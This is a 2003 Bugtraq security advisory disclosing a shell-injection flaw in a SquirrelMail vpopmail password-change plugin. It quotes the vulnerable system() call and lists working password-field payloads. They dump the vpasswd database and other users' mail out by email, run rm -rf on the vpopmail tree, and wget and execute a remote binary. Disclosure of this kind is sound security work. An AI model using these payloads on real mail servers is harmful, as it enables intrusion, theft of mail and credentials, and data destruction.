[29280] in bugtraq
VPOPMail Account Administration (squirrel mail) version 0.9.7
daemon@ATHENA.MIT.EDU (error)
Wed Mar 12 13:17:10 2003
From: error <error@lostinthenoise.net>
To: bugtraq@securityfocus.com
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-V5qBqOOsXJDk51eLqeI4"
Message-Id: <1047489900.1421.337.camel@eris>
Mime-Version: 1.0
Date: 12 Mar 2003 09:25:01 -0800
--=-V5qBqOOsXJDk51eLqeI4
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Plugin info: http://www.squirrelmail.org/plugin_view.php?id=3D103
Description:
VPOPMail Account Administration
The plugin lets the user do the tasks he would be able using qmailadmin
change password
let mails forward
create away messages
Notes (from the README):
************* IMPORTANT ************
For the plugin to work correctly, the Web-Server needs to run as
same user
as vpopmail does (most common: user vpopmail)
this is because the plugin needs write-permissions to the users
Maildir to
- create appropriate .qmail-files
- create away - messages
Comments (from myself):
This (allowing anything to be excuted as the web user) of course is a
huge security hole. This actually goes beyond that and says to run the
web server as vpopmail!
Amazing!
These people are far too trusting of their users.
Bad idea.
What could be worse?
How about making it even easier to exploit every vpopmail binary?
How?
Unclean input parsing!
If the vpopmail user is the same as the webuser you get to have fun
with:
vaddaliasdomain vconvert vdominfo vpasswd
vadddomain vdeldomain vipmap vpopbull
vadduser vdelivermail vkill vqmaillocal
valias vdeloldusers vmkpasswd vsetuserquota
vchkpw vdeluser vmoduser vuserinfo
Basically the exploits are unlimited (as you get full access rights to
vpopmail):
#change password
password;~vpopmail/bin/vpasswd user@host password
#mail password database
password;cat ~vpopmail/domains/example.com/vpasswd|mail -s owned
user@host
#remove vpopmail
password;rm -rf ~vpopmail/
#get listings of mail
password;ls ~vpopmail/domains/example.com/user/Maildir/new| mail
user@host
#read any users mail
passwd;cat
~vpopmail/domains/example.com/user/Maildir/new//1027359339.48628.example.co=
m\,S\=3D2432 | mail user@host
#execute other arbatrary code on server
passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f;
Here is the offending code (line 45 in vpopmail.php):
system("$vpasswd $username $pwd");
As we can see, this is very bad.
Very bad security model (running your webserver as vpopmail) backed up by s=
loppy coding (passing user entered data into the shell unescaped) =3D=3D ba=
d bad bad.
So you just pass anything I wrote above (or really anything at all that
you desire) and you own the systems vpopmail config.
Enter this data into the password changing field (make sure it matches
up in both) in the squirrel mail vpopmail password section to exploit.
But it's just a plugin to a webmail system, so no big deal ;-)
--=20
error <error@lostinthenoise.net>
--=-V5qBqOOsXJDk51eLqeI4
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
iD8DBQA+b21sKvrsP0edi7gRAk0tAJ9TKX1BNyRXyYjICvDema7T8pBMygCgvGI9
n6DYkkIKJ8YmCTgefULpO7o=
=/g+W
-----END PGP SIGNATURE-----
--=-V5qBqOOsXJDk51eLqeI4--
